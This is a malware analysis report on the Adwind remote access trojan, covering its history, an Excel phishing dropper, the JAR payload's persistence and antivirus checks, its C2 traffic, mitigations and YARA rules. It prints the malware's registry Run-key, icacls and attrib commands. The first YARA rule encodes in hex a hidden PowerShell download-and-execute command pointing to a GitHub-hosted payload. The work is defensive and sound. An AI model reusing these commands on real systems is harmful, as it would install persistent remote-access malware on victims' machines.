ADWIND RAT TECHNICAL ANALYSIS

REPORT
CONTENTS
Information about the file paths, registry records, logs and all indicators of Adwind malware
type of Remote Access Trojan has been analyzed and reported in detail.

Introduction ........................................................... 2
Rapor.xlsx Document Analysis ............................. 3
Adwind.jar File Analysis ........................................ 4
Adwind.jar Network Analysis ................................. 7
Solution Proposals ................................................ 9
Yara Rule ............................................................ 10
Introduction
The developer of the RAT-type Adwind malware is a Mexican-based Spanish hacker and
started selling the java-based remote access tool (RAT) called "Frutas" in the Adwind
family in early 2012. It was changed at least seven times in the following years and was
released under the names Adwind, UnReCoM, Alien Spy, JSocket, JBifrots,
UnknownRat and JConnectPro.

Adwind RAT, a cross-platform, multi-functional malware program distributed through a

single malware platform, is one of the main features that distinguishes it from other
commercial malware, is that it is sold online. It is the clear distribution of the "customer"
in the form of a paid service in which he pays a fee for the use of the malicious program.
By the end of 2015, the system had approximately 1,800 users. This makes it one of the
biggest malware platforms available today.

Between 2013 and 2016, different versions of Adwind were used in attacks against at
least 443,000 private users in the world, commercial and non -commercial organizations.

On 11 January 2012, the forum user "indetectables[.]Net" named "adwind" shared an

article about "Frutas RAT". In his article, he wrote that he started the Frutas RAT project
and progressed slowly because he did everything alone and did not use any 3rd Party
code and used NETBEANS as the development environment. This user in the forum has
released several updates for Frutas RAT throughout 2012. Changed the “Frutas RAT”
which was free since December 2012 to “Adwind RAT” and made it paid.

Adwind RAT, which was renamed in early 2013, was offered for sale via various
communication methods such as Skype or mail. Adwind RAT, which was released with a
price of $ 55 at the first exit, has also been stated that the price will increase and be $
100 as of February 15th. With the update made in 2013, Android support was also
provided. Due to its many features and working on most platforms, it has beco me a very
popular tool in a short time. With this popularity, the developer of Adwind RAT opened a
Youtube channel and shared information such as how to use the tutorial videos of
Adwind RAT through this channel. Adwind RAT was used for the first time in a targeted
attack in Pacific Asia. In November 2013, the malware was renamed UNRECOM This
rebranded version of Adwind continued to retain all of its old features.

In 2014, Adwind's source code leaked and became available online for free, in response
to the leak, the "official" version of Adwind Trojan was significantly upgraded and re -
released as AlienSpy in October 2014. This version of the malware gained various
features such as detecting sandboxes, cryptographically secure communication with the
control server, and auto-detecting and disabling antivirus programs.
Rapor.xlsx Document Analysis
File Name Rapor.xlsx
Md5 5ba62c034584b88e44b5364e4131671c
Sha1 b4a8dfe2eebaf436c021458e515baf39ed812740
Sha256 9e61a8cf313337d2b72fc463164afc2e332fa26fda145c18fc6de6acd68af7db

Adwind malware comes as an excel document with phishing attacks on the system
first. When the excel document sent in addition to the mails with different content sent
to the victim was first opened by the victim, an excel document containing the
meaningless characters appears with the warning “you have to activate the content”.

After this warning, the excel document requests permission for cmd.exe to run a script
code hidden in its sub cells.

This piece of code downloads the actual malicious code via github and runs it without
any user permission and opening a console window to the screen. When we look at
the hex values of the excel docment, this piece of code appears..
This excel document, which is our first harmful file, does not do any harmful operation
except for downloading malicious code as dropper task.

Adwind.jar File Analysis

File Name Adwind.jar
Md5 8961392f55bdbfaa48c906ab5594afe3
Sha1 8ca09bebe64bc1f8a2b5e50d4883f81d58a9f9fc
Sha256 c52f88bc3da6ce73dbed459115b2fbdfa41effc4313ea6e5cf4a9bb162b916d0

The adwind.jar file, which is our downloaded malicious file, performs the actual
malicious processes. First of all, we see that when it is run on the system, it is obfuscate
with an allatori tool, which is an obfuscate tool.
It obfuscates itself, making it difficult to detect by anti viruses and analysts. Then makes
some checks when he works on the system. These controls are public ip detection and
country identification over the network. After passing these controls, it starts its harmful
activities on the system.
Firstly, it performs operations such as providing command permanence and providing
information to command and control servers by running commands on Shell. For this
purpose, it changes the access rights of the directory to access the directory where the
java program is installed on the system.

"%WinDir%\system32\icacls.exe %AllUsersProfile%\Oracle\Java\.oracle_jre_usage /grant

veryone:(OI)(CI)M"

After getting these permissions, he writes to the beginning so that he can start himself every
time the computer is turned on. It selects the 'Uninstaller' folder created by the user to the \
AppData \ Roaming directory under the home directory.
 "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v
JavaSun_Uninstall_00001_00002 /t REG_SZ /d
\%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe\ -jar
\%AppData%\Uninstall\Uninstall.Uninstaller\ /f"

After adding itself to the start directory, the hidden file with the parameter "+ h" to hide the
directory where it is located from the user with the tool "atrib.exe" in the windows system, to
prevent the changes that can be made on the file, to be perceived only as a read and system
file with "+ r". + s” sets it as a system file.

attrib +s +h +r %AppData%\Uninstall\*.*

attrib +s +h +r %AppData%\Uninstall
 After these processes, it now ensures its permanence and access on the system.

%ProgramFiles%\Java\jre1.8.0_251\bin\javaw.exe -jar %AppData%\Uninstall\Uninstall.Uninstaller

Our malware uses WMIC.exe to detect AV software running on the system as soon as it starts
itself.

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get

displayName /Format:List

After these processes, it hides the “Uninstall” file created by the user in the home directory .

attrib +H %UserProfile%\.Uninstall

Adwind.jar Network Analysis

As soon as our malicious file enters the system, it does some checks and collects information.
After these controls, he decides to infect the system and communicates with the command and
control server.

First, the victim uses amazon's servers to get the system's public ip address. It identifies the
IP address of the victim system via the address "http://checkip[.]amazonaws [.]com".
Using the API of "ipinfo [.]io" site, it determines the country where the victim is located. Harmful
Turkey's target is the location, Country code TR is the external work.

After these operations, it performs its harmful activities on the system and it has been
determined that it communicates with the command and control server 21736[.]xyz domain.

However, the command and control server is closed.

Solution Proposals
- Use of up-to-date, reliable antivirus software in systems,
- Careful reading of incoming mails does not open without scanning the
attachments in it,
- Spam mails were ignored,
- paying attention to phishing sites while browsing the internet,
- Installing the latest updates available in the operating system,
- Monitoring the processes and network movements performed by the running
processes on the system
- Filtering IP addresses, domains and addresses of C&C servers that establish
harmful connections on the network

These solutions can prevent the Adwind malware of Trojan Rat from infecting and
damaging the system.
 Yara Rule
import "hash"
rule Rapor: xlsx
{
meta:
description = "Adwind RAT Trojan"
first_date = "13.05.2020"
report_date = "18.07.2020"
file_name = "Rapor.xlsx"
strings:
$s1 = {63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74
69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D
61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E
57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A
2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38
36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63
67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54
55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00
15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55}
$s2 = "https://raw.githubusercontent.com/5308682/4yba8444mtcra11/gh-
pages/wucgy3jecwgpv.svg"
condition:
hash.md5(0,filesize) == "5ba62c034584b88e44b5364e4131671c" or $s1 or $s2
}
rule Adwind: java
{
meta:
description = "Adwind RAT Trojan"
first_date = "13.05.2020"

report_date = "18.07.2020"
file_name = "Adwind.jar"
strings:
$s1 = "16245"
$s2 = "A$D.class"
$s3 = "A.class"
$s4 = "B.class"
$s5 = "C.class"
$s6 = "D$A.class"
$s7 = "D.class"
$s8 = "u2Br3cvUkb"
$s9 = "c.class"
$s10 = "n.class"
$s11 ="mny\\zsh"
condition:
hash.md5(0,filesize) == "8961392f55bdbfaa48c906ab5594afe3" or all of the m